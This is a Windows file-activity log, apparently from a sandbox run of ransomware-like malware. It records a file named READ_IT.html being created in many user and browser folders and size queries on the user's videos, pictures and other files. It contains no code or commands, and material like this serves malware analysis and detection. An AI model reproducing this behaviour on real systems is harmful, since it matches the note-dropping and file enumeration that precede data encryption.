Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\pl\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\pl\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\no\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\no\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\nl\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\nl\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\lv\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\lv\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\lt\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\lt\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ko\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ko\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ja\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ja\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\it\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\it\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\id\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\id\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\hu\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\hu\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\hr\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\hr\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\hi\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\hi\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\he\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\he\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\fr\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\fr\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\fil\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\fil\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\fi\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\fi\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\es\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\es\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\en\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\en\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\el\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\el\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\de\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\de\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\da\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\da\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\cs\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\cs\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ca\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ca\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\bg\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\bg\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ar\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\ar\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\outlook logging\firstrun.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\outlook logging\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Low\JavaDeployReg.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Low\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\History\History.IE5\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\History\History.IE5\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\History\History.IE5\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Cookies\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\Cookies\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\updates\E7CF176E110C211B\active-update.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\updates\E7CF176E110C211B\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\0\update.mar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\0\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\0\update.status	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\_CACHE_CLEAN_	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\thumbnails\4cc87c1409819bf06f42b782d4902b2f.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\thumbnails\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\thumbnails\ab68b23ba499a12eeb8774a7c0b258f3.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\thumbnails\ba182bcd131f1f3c6b6fbbb1ba078341.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\thumbnails\cda93a6bd681b5f6eaf29ea686e2b6f1.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\thumbnails\ce8c0453589216a67cddb50284fbfe8d.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\startupCache\startupCache.4.little	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\startupCache\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-malware-shavar.cache	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-malware-shavar.pset	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-malware-shavar.sbstore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-phish-shavar.cache	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-phish-shavar.pset	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Mozilla\Firefox\Profiles\5cb79syl.default\safebrowsing\goog-phish-shavar.sbstore	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.ini	type = size, size_out = 20	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\1og0qP3Fd-msLjBK.mp4	type = size, size_out = 75402	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\desktop.ini	type = size, size_out = 504	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\READ_IT.html	type = file_attributes	7	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\KyzG9Qjv.mp4	type = size, size_out = 10938	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\mRBfXb6WZFJqjhJ.avi	type = size, size_out = 89010	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\oaU1-cqbOI.flv	type = size, size_out = 11890	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\RQT04-SfCzOy.swf	type = size, size_out = 2465	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\ZplS8lO4RHe9I.flv	type = size, size_out = 73196	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\ZsxMbWqK2e.avi	type = size, size_out = 69833	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\6NqrR.flv	type = size, size_out = 68042	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\CaCxexCSoudw1ihbRVJj.flv	type = size, size_out = 73162	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\READ_IT.html	type = file_attributes	6	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\cpe6B9Cb6wzufywLybXe.avi	type = size, size_out = 26344	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\Kn8m4xKHxS.mp4	type = size, size_out = 43000	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\nAC 5Jyw.mp4	type = size, size_out = 71419	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\T4peD9H1NCe.avi	type = size, size_out = 11931	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\Z5EbMfgJ8h8.avi	type = size, size_out = 62257	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\f ZdvB2R.avi	type = size, size_out = 99287	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\FnM9eY1OQb.swf	type = size, size_out = 80170	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\READ_IT.html	type = file_attributes	8	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\FV9TKZgsub.mp4	type = size, size_out = 82670	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\oCKBGbVfktOD_QgfRkQn.swf	type = size, size_out = 16915	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\oIsaJRkn_H.mkv	type = size, size_out = 1951	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\teTxJJ37R28jW0n.mp4	type = size, size_out = 23563	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\xhLR3jry9wKPAx.mp4	type = size, size_out = 37432	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\YbWCW_EpzK5By0z.mkv	type = size, size_out = 54769	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\zmkOg8xlo9RCs.mkv	type = size, size_out = 19734	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\2I7JnWG0LWz13O.flv	type = size, size_out = 21553	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\55QyNPcjbWZw8F.swf	type = size, size_out = 27328	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\READ_IT.html	type = file_attributes	3	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\Mrd3L.mp4	type = size, size_out = 100703	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\ZGIRTyBopanWciF8O1.swf	type = size, size_out = 65883	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\desktop.ini	type = size, size_out = 524	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\Everywhere.search-ms	type = size, size_out = 248	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\READ_IT.html	type = file_attributes	2	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\Indexed Locations.search-ms	type = size, size_out = 248	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Saved Games\desktop.ini	type = size, size_out = 282	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Saved Games\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\2B4wMbwVq9SNluu4Mk.bmp	type = size, size_out = 24928	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\READ_IT.html	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\3JtCbgJTkKSXrDHl2vx.bmp	type = size, size_out = 42096	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\READ_IT.html	type = file_attributes	14	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\4tyoVjchuR84aw.gif	type = size, size_out = 75574	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\6BloETBFt_jtJmwTWVVk.gif	type = size, size_out = 67264	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\6QfPygn63k3CNso.gif	type = size, size_out = 35256	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\70yIEg1GZzXq5b23S.png	type = size, size_out = 36842	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\7eR4.gif	type = size, size_out = 99455	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\A3L WgbY9v41odw.bmp	type = size, size_out = 30304	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\bAzjHbM7.jpg	type = size, size_out = 78703	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\desktop.ini	type = size, size_out = 504	1	Fn
